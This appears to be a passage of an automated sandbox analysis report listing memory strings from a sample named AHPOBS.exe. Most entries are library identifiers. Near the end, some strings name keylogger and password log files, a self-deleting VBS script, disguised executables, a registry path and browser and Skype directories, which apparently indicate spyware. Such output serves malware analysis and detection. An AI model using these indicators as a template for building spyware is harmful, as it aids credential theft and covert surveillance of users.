              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword latency;h memstr_d2e713e6-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tagpointlitee memstr_932c0a14-8
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tcpevent_none> memstr_ccb6608a-3
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sqlite_misuse; memstr_0c07bc3a-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tcpevent_data4 memstr_22b48870-f
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sqlite_mismatch1 memstr_39c5b8fa-2
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sqlite_row* memstr_994f775c-6
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: g_hdb_sqlite' memstr_d2af9066-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sqlite_corrupt memstr_c33e155d-c
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gdip_epgqualitymemstr_7feda1a7-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gdip_eptlongmemstr_3b03c1cf-8
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _escapi_dllmemstr_15f84d09-1
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gui_focusrgbmemstr_ceefcc02-4
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sqlite_donee memstr_c20444a8-c
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __ghdbs_sqlitememstr_e10a7dba-2
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gdip_pxf24rgbmemstr_7168dd72-9
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ws_popupmemstr_4658b74f-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: stdout_childememstr_6e94f7d7-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: g_hdll_sqlitehmemstr_f6f28022-1
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: em_scrollostmemstr_21cd5706-b
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sqlite_open_createte\:tvmemstr_a1bf3c6b-6
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sqlite_open_readwrite\:tvmemstr_1b6e75b4-b
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sqlite_type_blobtf8\:tvmemstr_4289f7fb-f
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sqlite_encoding_utf8\:tvmemstr_d557be74-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sqlite_type_nullmemstr_8cbfe3a1-6
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ite\:tvmemstr_e48c86fb-8
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: g_butf8errormsg_sqlite\:tvmemstr_4125291b-f
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: g_sprintcallback_sqlite]:twmemstr_c28ae1c3-f
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __gbsafemodestate_sqliter:txmemstr_e5912fd1-9
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uintm"memstr_5c091e77-c
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: isoketmemstr_dc6f9750-9
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: logxsda"memstr_ec39b251-a
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uint\"memstr_82fa79c1-a
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: eltoulmemstr_775a48ab-6
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uintp"memstr_f7319205-4
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uint2pmemstr_68d39eef-8
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lengthmemstr_79b413aa-f
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: float;memstr_52ae5e29-3
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword flags;memstr_949d1bc0-a
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bass_sample_fx},memstr_9817f37f-b
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword chans;y;v,memstr_4008f61a-c
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword priority;s,memstr_66ccb955-0
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: float maxdist;l,memstr_7f80cf36-a
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: float mindist;i,memstr_ec36ca14-7
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword oangle;b,memstr_dcbab026-3
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword ctype;_,memstr_ef941035-f
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword iangle;x,memstr_dbef82ec-f
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: float outvol;u,memstr_acfee04e-f
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword max;;n,memstr_024fdfba-0
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: float volume;k,memstr_742bf9b7-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword freq;d,memstr_20a24f04-2
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword freqa,memstr_b1fa228e-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword freqs;:,memstr_bf27e0ad-1
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword origres;7,memstr_9cbc0e7c-6
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bass_recordinfo0,memstr_cd0580f4-1
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword flags;-,memstr_4486078e-8
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword length;&,memstr_db0a3b61-6
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword mingap;#,memstr_d114fe4e-2
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword chans;memstr_47632dce-7
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword mode3d;memstr_3b6ed34a-a
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: int singlein;memstr_703bc69a-2
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword vam;e;memstr_075c27df-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bass_samplememstr_8027059a-3
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword inputs;memstr_f99ad6c7-1
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword formats;memstr_9971cf6d-9
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: float pan;memstr_a58c289c-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword freq;fxmemstr_4c40c457-4
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword speakers;memstr_7c33197f-a
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bass_3dvectormemstr_4906bc48-b
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bass_pluginformmemstr_ab189d23-1
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword version;memstr_a78d2265-f
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: float z;memstr_9dd1e9a7-a
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bass_dx8_chorusmemstr_487f5483-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword sample;memstr_c9cdfb6f-3
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: float x;memstr_8e0008a1-a
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bass_dx8_echomemstr_a374e1d0-0
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bass_plugininfomemstr_be4d3f8b-4
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword;ptr;ptr;memstr_77de81f4-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ptr filename;memstr_3b85d12d-b
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword origres;memstr_abbdbd67-0
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword formatc;memstr_e03f28a8-3
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: float y;ctormemstr_97797bea-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword plugin;memstr_5616e83b-9
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ptr formats;z;\ymemstr_7ce4245f-2
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wm_cap_unicode_endstmemstr_b9a9e87c-c
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bass_err_dll_no_exist}-memstr_39501ece-c
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wm_cap_unicode_starto-memstr_e8845f20-f
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wm_cap_pal_savewf-memstr_c7e4fd7b-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wm_cap_set_scalewratea-memstr_4f73a9d9-a
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wm_cap_file_savedibax-memstr_7a1de7fc-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gitifcompressionle s-memstr_22b4b3df-b
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bass_dll_udf_vere-memstr_22d38a48-9
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bass_dx8_parameq<-memstr_1f0decd1-a
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wm_cap_set_overlayt7-memstr_6e9bbf6c-8
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bass_enc_dll_udf_ver.-memstr_544d3a9b-7
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bass_dx8_compressor)-memstr_f9a5289e-f
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wscript.sleep 5000 -memstr_72579388-3
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _gbbassulonglongfixedmemstr_94dbd82b-7
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: variable.deletefile memstr_863fcb9a-f
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wm_cap_unicode_endmemstr_a3689b67-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wm_cap_set_previewctmemstr_c0041439-4
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wm_cap_set_previewratememstr_4ef1b727-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkcu\software\win32wmemstr_6ff7876c-b
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \proxy_client.dllmemstr_697fefc7-6
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wm_cap_driver_connectmemstr_d19a8633-c
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bass_channelinfomemstr_5be90daf-4
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bass_dx8_i3dl2reverbmemstr_71d3d8cd-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bass_err_dll_no_existmemstr_df315585-6
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bass_dx8_flangermemstr_d8d1d7ee-7
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wm_cap_unicode_startmemstr_d49dcee3-c
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bass_dx8_distortionmemstr_33090dc8-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wm_cap_pal_savewartmemstr_44345085-3
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: spi_setdeskwallpapermemstr_c0e029e1-f
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: appdatacommondirmemstr_06222b67-4
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gdip_evtcompressionlzwz8\zmemstr_353a030e-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hophxmemstr_76648a30-4
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword;memstr_4db00bbd-4
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: z)-m.memstr_ff25e8ec-1
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y)(m/memstr_dd94cab0-7
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t)+m0memstr_f157d5f3-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s)&m1memstr_41273872-c
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n)!m2memstr_216dee96-4
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v)m:memstr_670a3ef5-a
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j)}m>memstr_c007402b-f
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: i)xm?memstr_13f59091-1
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: int;d){m@memstr_fe08a450-a
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c)vmamemstr_40e1ae54-3
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >)qmbmemstr_bd0df80a-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =)lmcmemstr_30f631c4-7
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8)omdmemstr_590b0428-a
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7)jmememstr_72ca89d2-4
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2)emfmemstr_a846ff53-f
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1)`mgmemstr_a41098a9-4
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ,)cmhmemstr_4ac33b1d-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: float;+)^mimemstr_29eab704-c
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &)ymjmemstr_750e8c30-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %)tmkmemstr_06b3d7b2-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: )wmlmemstr_7d99e145-0
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: int;r*%lmemstr_6ee61d5b-c
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tempdirq* lmemstr_07d4d07d-4
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: float;z*memstr_ae66ed5e-f
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: float;t*memstr_4fb3a7dc-9
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: int;h*memstr_127d4952-c
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: basstpwmemstr_c533182d-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: float;;*nlmemstr_7e82fb36-b
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: float;6*ilmemstr_ff571137-a
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: float;0*glmemstr_5f5f5bba-f
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wm_cap_startmemstr_ddca01ff-6
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /passw8.txtz+memstr_6bc23d6f-2
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /klog.txtw+memstr_95e290ba-8
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \del.vbsp+memstr_368580e5-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lolrreqqm+memstr_99667900-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: appdatadirf+memstr_3e00277b-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fftaaertpc+memstr_f09b1c6d-9
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fft44eteetsdfd\+memstr_603b2b05-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cccveeeeeetsdfdy+memstr_a877594f-9
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ws_visibler+memstr_b03eacaf-7
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /pl2.txto+memstr_2449cdfe-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: appdatadirh+memstr_2f515faf-c
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ccveertse+memstr_7f0c3bae-6
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wmplayer.exe>+memstr_4624c981-7
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: appdatadir;+memstr_6b12c9e6-b
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: svwin1.exenk4+memstr_77a4a617-4
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \etx.exe1+memstr_b3f1eb8d-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \windata\mon*+memstr_ecf208c5-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: skypedir'+memstr_c787f7df-4
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /;xposter.lnk +memstr_fef50b73-6
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: svwin2.exememstr_73415841-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: firefox.exememstr_1984f5e6-b
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \pl2.exememstr_6aa21340-8
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /dst8.txtmemstr_4feb65a1-0
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \xms8.bin+>mmemstr_1abfe8ae-3
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \windata\memstr_e74e38e0-f
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /ransound.wmamemstr_0739c5bd-5
